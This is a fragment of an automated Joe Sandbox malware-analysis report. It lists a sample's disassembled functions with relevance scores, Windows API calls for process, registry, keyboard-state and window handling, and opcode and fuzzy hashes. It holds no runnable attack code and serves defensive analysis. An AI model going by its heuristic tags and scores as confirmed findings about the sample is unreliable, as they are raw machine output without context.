                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 014d50862c245c304508e76f6c39657554760fdf3c05df18a624a82386e20be3
                                                            • Instruction ID: 2b4c945aaa6d2fb555791346970a7f0e6d5b8e9979f8f7315adeb18553065130
                                                            • Opcode Fuzzy Hash: 014d50862c245c304508e76f6c39657554760fdf3c05df18a624a82386e20be3
                                                            • Instruction Fuzzy Hash: 94115E3492020ADFCF00EFA4D9519FEB7B5FF36304B108569D85667292EB329E1ACB50
                                                            Function 0021EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0021EF1B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0021EF4B
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0021F07E
                                                            • CloseHandle.KERNEL32(?), ref: 0021F0FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: bd1b9ff0ee1729fe30c5a2d4fc8e26d51364c6e59c5866fbc47b945f082ece11
                                                            • Instruction ID: 104f0cb542264234b23eb07feb6f1252a44579e6e7bc2bc001a311bbc91b51ff
                                                            • Opcode Fuzzy Hash: bd1b9ff0ee1729fe30c5a2d4fc8e26d51364c6e59c5866fbc47b945f082ece11
                                                            • Instruction Fuzzy Hash: C381A475610311AFD720DF24CD46F6AB7E5AF68720F04882DF999DB292DBB0AC81CB41
                                                            Function 002202C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 002210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220388
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002203C7
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0022040E
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0022043A
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00220447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 965ae0c3be4657336b75ce2b5548b0910332aa25b0dbbc5eead34325ac017f3a
                                                            • Instruction ID: ae051c1780f878fa2fedf67a2ae8d4846661f4253d379b79241da6cb3d8c1099
                                                            • Opcode Fuzzy Hash: 965ae0c3be4657336b75ce2b5548b0910332aa25b0dbbc5eead34325ac017f3a
                                                            • Instruction Fuzzy Hash: 80516B31218205AFD704EFA4EC85F6EB7E8FF94304F04896DB595872A2DB70EA15CB52
                                                            Function 0020E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0020E88A
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0020E8B3
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0020E8F2
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0020E917
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0020E91F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: a1eac6ba0f322d228c37c8fafbc255061bd2a5cd94ad07e8726a849d0f7c7da7
                                                            • Instruction ID: e146c67a8cd00ef2248111b6092efe0ecf063703dc27114c3174d7533933dbdb
                                                            • Opcode Fuzzy Hash: a1eac6ba0f322d228c37c8fafbc255061bd2a5cd94ad07e8726a849d0f7c7da7
                                                            • Instruction Fuzzy Hash: 5F514039A00205EFCF11DF64C98196EBBF5FF19314B1484A9E809AB362DB31ED51CB50
                                                            Function 0022A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9320d3134e615aef50155b904e398bbaa0bda6bcbe77a0951144a2160c04213
                                                            • Instruction ID: 8d00f880bebc818e6285f2cf1bab57883728f6155678550b9843f176fcc2cce5
                                                            • Opcode Fuzzy Hash: f9320d3134e615aef50155b904e398bbaa0bda6bcbe77a0951144a2160c04213
                                                            • Instruction Fuzzy Hash: AF412635920125FFC720DFA8EC48FE9BBA8EB09310F1441A5F815A76E0C7B0AD61DA91
                                                            Function 001A2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 001A2357
                                                            • ScreenToClient.USER32(002667B0,?), ref: 001A2374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 001A2399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 001A23A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 66f61e5b509e3187a0c1efafe158166dbbd0250655c490b38e0bd4cb590eef37
                                                            • Instruction ID: 48008ecf44ba73ddb99263557f3e9ce01122927bb8b9558db5d22213b165065a
                                                            • Opcode Fuzzy Hash: 66f61e5b509e3187a0c1efafe158166dbbd0250655c490b38e0bd4cb590eef37
                                                            • Instruction Fuzzy Hash: F141827550411AFBDF199FA8D848AEEBB74FF0A720F20436AF82992290C7346954DF91
                                                            Function 001F6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F695D
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 001F69A9
                                                            • TranslateMessage.USER32(?), ref: 001F69D2
                                                            • DispatchMessageW.USER32(?), ref: 001F69DC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F69EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: e8336a15de4b8296ffa409bc5506f0fe0288cda30dbbe8c7c5450211cca49f0b
                                                            • Instruction ID: 2f06bdc1a55f87046b75aa1e17ab04663d090e9ebb43b43eca170e16750c0a53
                                                            • Opcode Fuzzy Hash: e8336a15de4b8296ffa409bc5506f0fe0288cda30dbbe8c7c5450211cca49f0b
                                                            • Instruction Fuzzy Hash: 1B31C57150024AAEDB65CF74AC4CFB6BBBCFB11308F148169E621D30A1D7B59889D7A0
                                                            Function 001F8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 001F8F12
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 001F8FBC
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001F8FC4
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 001F8FD2
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001F8FDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 62c0f7c1b5266076235b2b4df47cc19ad4ecf28466bd1218fe405e9a2995baf2
                                                            • Instruction ID: 4bfcf3efbbfda35c5aa1f5213cdffaf5374348b00db56875fc7158c9ef6d02af
                                                            • Opcode Fuzzy Hash: 62c0f7c1b5266076235b2b4df47cc19ad4ecf28466bd1218fe405e9a2995baf2
                                                            • Instruction Fuzzy Hash: 9E31AE7150021DEFDF24CFA8EE4DAAE7BB6EB44315F104229FA25EA1D0C7B09914DB91
                                                            Function 001FB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 001FB6C7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001FB6E4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001FB71C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001FB742
                                                            • _wcsstr.LIBCMT ref: 001FB74C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: e0ae9c3a5e3a1741bc34aa8bb33b76d48d45a6c9aa4b8bfdb8645541455db119
                                                            • Instruction ID: 8b43dd3cf706912eea08d5652aff4d9158608251be7f456d547048498c52a718
                                                            • Opcode Fuzzy Hash: e0ae9c3a5e3a1741bc34aa8bb33b76d48d45a6c9aa4b8bfdb8645541455db119
                                                            • Instruction Fuzzy Hash: 4A210731208208BBEB256B79ED89E7B7BACDF59720F10413DFD05CA1A1EB61DC4196A0
                                                            Function 0022B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022B44C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0022B471
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0022B489
                                                            • GetSystemMetrics.USER32(00000004), ref: 0022B4B2
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00211184,00000000), ref: 0022B4D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: cfc10345a77e812126b1e9266759540cefaec30af7398be9865aaf555c7648b8
                                                            • Instruction ID: e0288410ee702c3f256caa9ef361f33273f2be5c11f7769abe3100d162a3c949
                                                            • Opcode Fuzzy Hash: cfc10345a77e812126b1e9266759540cefaec30af7398be9865aaf555c7648b8
                                                            • Instruction Fuzzy Hash: 4721A631920226BFCB21AFB8EC98A6677A4FB05721F144734F925D71E1E7709831DB90
                                                            Function 001F97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001F9802
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001F9834
                                                            • __itow.LIBCMT ref: 001F984C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001F9874
                                                            • __itow.LIBCMT ref: 001F9885
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: dc188f020c7022f464e0f68b009e2cb11151e1dc2ffc0418308411e8fb5acb0a
                                                            • Instruction ID: a91d83a88f043dd509db888c5af2c485c7964855a6537c72e0c972462df4b418
                                                            • Opcode Fuzzy Hash: dc188f020c7022f464e0f68b009e2cb11151e1dc2ffc0418308411e8fb5acb0a
                                                            • Instruction Fuzzy Hash: 1821B67560020CBBDB20AAA59C8AFFE7BA8DF5A760F084039FA049B291D7708D4587D1
                                                            Function 001A12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001A134D
                                                            • SelectObject.GDI32(?,00000000), ref: 001A135C
                                                            • BeginPath.GDI32(?), ref: 001A1373
                                                            • SelectObject.GDI32(?,00000000), ref: 001A139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: ed1636da22b3087965c3c1d6b099d6d6f4642255e20da1bb07d9a91ffad75bbf
                                                            • Instruction ID: 0208bff2082112eaf10adc6e23c228fefa41e81ac8388aef787ee8496849c82e
                                                            • Opcode Fuzzy Hash: ed1636da22b3087965c3c1d6b099d6d6f4642255e20da1bb07d9a91ffad75bbf
                                                            • Instruction Fuzzy Hash: FA214875800208FBDF118F65ED0CBA97BB8FB01321F248226E810971A0D3B1999ADB90
                                                            Function 001FC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: c890126912dfee178ee73b2bd24664fc09e720dd238055ebb78114f177c972f5
                                                            • Instruction ID: cb5d7572e7de65ac9868c09ed5b09eed24ea4320b74733c5d0daa9aa84c89c79
                                                            • Opcode Fuzzy Hash: c890126912dfee178ee73b2bd24664fc09e720dd238055ebb78114f177c972f5
                                                            • Instruction Fuzzy Hash: A801B5B1A4811DFBE208E6209E52FBB739C9B32394F054025FE0497283E790EE3592E0
                                                            Function 00204D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00204D5C
                                                            • __beginthreadex.LIBCMT ref: 00204D7A
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00204D8F
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00204DA5
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00204DAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 91447d24e21d3d7054e37ddae7b9788c63065afc074c8750aecf293af3d5ef45
                                                            • Instruction ID: 26bbc5cc7830fde0e63bb033970928e4140e75ae16499485629f23c16f0dd7b1
                                                            • Opcode Fuzzy Hash: 91447d24e21d3d7054e37ddae7b9788c63065afc074c8750aecf293af3d5ef45
                                                            • Instruction Fuzzy Hash: 9611E5B2914346BBC7119FB8AC0CA9A7BACEB45324F148269FD14D3291D6B18D1087A0
                                                            Function 001F874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
                                                            • GetLastError.KERNEL32(?,001F822A,?,?,?), ref: 001F8770
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,001F822A,?,?,?), ref: 001F877F
                                                            • HeapAlloc.KERNEL32(00000000,?,001F822A,?,?,?), ref: 001F8786
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F879D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: f7d3056261d1865847ffefd604507a7610c9ceef096fd82e9514eb4dc0dd7992
                                                            • Instruction ID: 17bb67de198adaa20c91407d3f5353fb3b4e0b2b2e4651e71d2fcbea76af4206
                                                            • Opcode Fuzzy Hash: f7d3056261d1865847ffefd604507a7610c9ceef096fd82e9514eb4dc0dd7992
                                                            • Instruction Fuzzy Hash: DD012871600208BF9B205FE6ED8D9ABBBBCEF897557200579F949C2260DB318C12CA60
                                                            Function 002054E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00205502
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00205510
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00205518
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00205522
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0020555E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: aaf2c3837c32356a8af890dbca30b5c40f52de0274310bcfb976948125b31d35
                                                            • Instruction ID: bb9373aaf84ddb2afd7ea6e7b6717ec7811cf08b6fdf793ae4eae07777939203
                                                            • Opcode Fuzzy Hash: aaf2c3837c32356a8af890dbca30b5c40f52de0274310bcfb976948125b31d35
                                                            • Instruction Fuzzy Hash: 09016135C10A29EBDF10DFE8ED4D6EEBB78FB09701F800066E905B2181DB305561CBA1
                                                            Function 001F7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
